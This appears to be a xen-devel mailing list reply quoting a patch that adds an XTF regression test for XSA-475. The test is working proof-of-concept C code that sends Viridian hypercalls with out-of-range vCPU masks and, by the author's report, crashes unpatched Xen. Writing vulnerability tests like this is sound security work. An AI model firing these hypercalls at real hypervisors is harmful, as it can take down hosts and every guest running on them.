[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [XTF PATCH] XSA-475 PoC: Viridian Out-of-bounds


  • To: xen-devel@xxxxxxxxxxxxxxxxxxxx
  • From: Teddy Astie <teddy.astie@xxxxxxxxxx>
  • Date: Wed, 8 Jul 2026 19:25:24 +0200
  • Authentication-results: eu.smtp.expurgate.cloud; dkim=pass header.s=selector1 header.d=vates.tech header.i="@vates.tech" header.h="From:Subject:Date:Message-ID:To:Cc:MIME-Version:Content-Type:In-Reply-To:References:Feedback-ID"
  • Autocrypt: addr=teddy.astie@xxxxxxxxxx; keydata= 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 x9fhaZEsniw8/bYgC3igkk5YJiOa
  • Cc: Andrew Cooper <andrew.cooper3@xxxxxxxxxx>
  • Delivery-date: Wed, 08 Jul 2026 17:25:48 +0000
  • Feedback-id: default:8631fc262581453bbf619ec5b2062170:Sweego
  • List-id: Xen developer discussion <xen-devel.lists.xenproject.org>

Le 08/07/2026 à 19:23, Teddy Astie a écrit :
Signed-off-by: Teddy Astie <teddy.astie@xxxxxxxxxx>
---
CC: Andrew Cooper <andrew.cooper3@xxxxxxxxxx>

Tested (crashing Xen) on a Xen build with reverted patch (tested both CVEs).

  docs/all-tests.dox         |   1 +
  tests/xsa-475/Makefile     |  11 ++++
  tests/xsa-475/extra.cfg.in |   1 +
  tests/xsa-475/main.c       | 124 +++++++++++++++++++++++++++++++++++++
  4 files changed, 137 insertions(+)
  create mode 100644 tests/xsa-475/Makefile
  create mode 100644 tests/xsa-475/extra.cfg.in
  create mode 100644 tests/xsa-475/main.c

diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index ff38747..441eaf7 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -185,6 +185,7 @@ states.
@subpage test-xsa-472-3 - Viridian reference TSC page leak. +@subpage test-xsa-475 - x86: Incorrect input sanitisation in Viridian hypercalls @section index-utility Utilities diff --git a/tests/xsa-475/Makefile b/tests/xsa-475/Makefile
new file mode 100644
index 0000000..31bdb84
--- /dev/null
+++ b/tests/xsa-475/Makefile
@@ -0,0 +1,11 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-475
+CATEGORY  := xsa
+TEST-ENVS := hvm64
+
+TEST-EXTRA-CFG := extra.cfg.in
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-475/extra.cfg.in b/tests/xsa-475/extra.cfg.in
new file mode 100644
index 0000000..7ca5a28
--- /dev/null
+++ b/tests/xsa-475/extra.cfg.in
@@ -0,0 +1 @@
+viridian = [ "base" ]
\ No newline at end of file
diff --git a/tests/xsa-475/main.c b/tests/xsa-475/main.c
new file mode 100644
index 0000000..cfdacab
--- /dev/null
+++ b/tests/xsa-475/main.c
@@ -0,0 +1,124 @@
+/**
+ * @file tests/xsa-475/main.c
+ * @ref test-xsa-475
+ *
+ * @page test-xsa-475 XSA-475
+ *
+ * Advisory: [XSA-475](https://xenbits.xen.org/xsa/advisory-475.html)
+ *
+ * Some bounds check were missing in viridian hypercalls, causing out of bound
+ * writes (CVE-2025-58147) or operating on a wild pointer (CVE-2025-58148).
+ * We can trigger it by targetting vCPUs ID that are over HVM_MAX_VCPUS.
+ *
+ * @see tests/xsa-475/main.c
+ */
+
+#include <xtf.h>
+
+const char test_title[] = "XSA-475";
+
+#define HVCALL_SEND_IPI 0x000b
+
+#define HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX  0x0013
+#define HVCALL_FLUSH_VIRTUAL_ADDRESS_LIST_EX   0x0014
+#define HVCALL_SEND_IPI_EX                     0x0015
+
+enum HV_GENERIC_SET_FORMAT {
+    HV_GENERIC_SET_SPARSE_4K,
+    HV_GENERIC_SET_ALL,
+};
+
+struct hv_vpset {
+    uint64_t format;
+    uint64_t valid_bank_mask;
+    uint64_t bank_contents[64];
+};
+
+static void test_send_ipi(uint64_t vcpu_mask)
+{
+    struct {
+        uint32_t vector;
+        uint8_t target_vtl;
+        uint8_t reserved_zero[3];
+        uint64_t vcpu_mask;
+    } input_params = { 0 };
+
+    input_params.vector = 0xD0;
+    input_params.vcpu_mask = vcpu_mask & ~1; /* Don't self-ipi */
+
+    if (vendor_is_intel)
+        asm volatile ("vmcall" :: "a"(0x80000000U), "c"(HVCALL_SEND_IPI),
+                                  "d"(&input_params) : "memory");
+    else if (vendor_is_amd)
+        asm volatile ("vmmcall" :: "a"(0x80000000U), "c"(HVCALL_SEND_IPI),
+                                   "d"(&input_params) : "memory");
+}
+
+static void test_send_ipi_ex(struct hv_vpset set)
+{
+    int ret = 0;
+    struct {
+        uint64_t address_space;
+        uint64_t flags;
+        struct hv_vpset set;
+    } input_params;
+
+    input_params.address_space = 0;
+    input_params.flags = 0;
+    input_params.set = set;
+
+    if (vendor_is_intel)
+        asm volatile ("vmcall" : "=a"(ret) : "a"(0x80000000U),
+                                 "c"(HVCALL_SEND_IPI_EX),
+                                 "d"(&input_params) : "memory");
+    else if (vendor_is_amd)
+        asm volatile ("vmmcall" : "=a"(ret) : "a"(0x80000000U),
+                                  "c"(HVCALL_SEND_IPI_EX),
+                                  "d"(&input_params) : "memory");
+}
+
+static void test_flush_vaddr_ex(struct hv_vpset set)
+{
+    int ret = 0;
+    struct {
+        uint64_t address_space;
+        uint64_t flags;
+        struct hv_vpset set;
+    } input_params;
+
+    input_params.address_space = 0;
+    input_params.flags = 0;
+    input_params.set = set;
+
+    if (vendor_is_intel)
+        asm volatile ("vmcall" : "=a"(ret) : "a"(0x80000000U),
+                                 "c"(HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX),
+                                 "d"(&input_params) : "memory");
+    else if (vendor_is_amd)
+        asm volatile ("vmmcall" : "=a"(ret) : "a"(0x80000000U),
+                                  "c"(HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX),
+                                  "d"(&input_params) : "memory");
+    }
+
+void test_main(void)
+{
+    struct hv_vpset set;
+    set.format = HV_GENERIC_SET_SPARSE_4K;
+
+    printk("Test HVCALL_SEND_IPI to 64 first CPUs (non-existent)\n");
+    test_send_ipi(~0);
+
+    printk("Test HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX with all banks set\n");
+    set.valid_bank_mask = ~0;
+    memset(set.bank_contents, 1, sizeof(set.bank_contents));
+    test_flush_vaddr_ex(set);
+
+    printk("Test HVCALL_FLUSH_VIRTUAL_ADDRESS_SPACE_EX with all banks set (skipping 
self)\n");

^

This is supposed to be HVCALL_SEND_IPI_EX here

+    set.valid_bank_mask = ~0;
+    memset(set.bank_contents, 1, sizeof(set.bank_contents));
+    set.bank_contents[0] &= 1; /* don't self-ipi */
+    test_send_ipi_ex(set);
+
+    xtf_success("Success: Probably not vulnerable to XSA-475\n");
+}
+

Attachment: OpenPGP_0x660FA9D102CBCFD0.asc
Description: OpenPGP public key

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature


 


Rackspace

Lists.xenproject.org is hosted with RackSpace, monitoring our
servers 24x7x365 and backed by RackSpace's Fanatical Support®.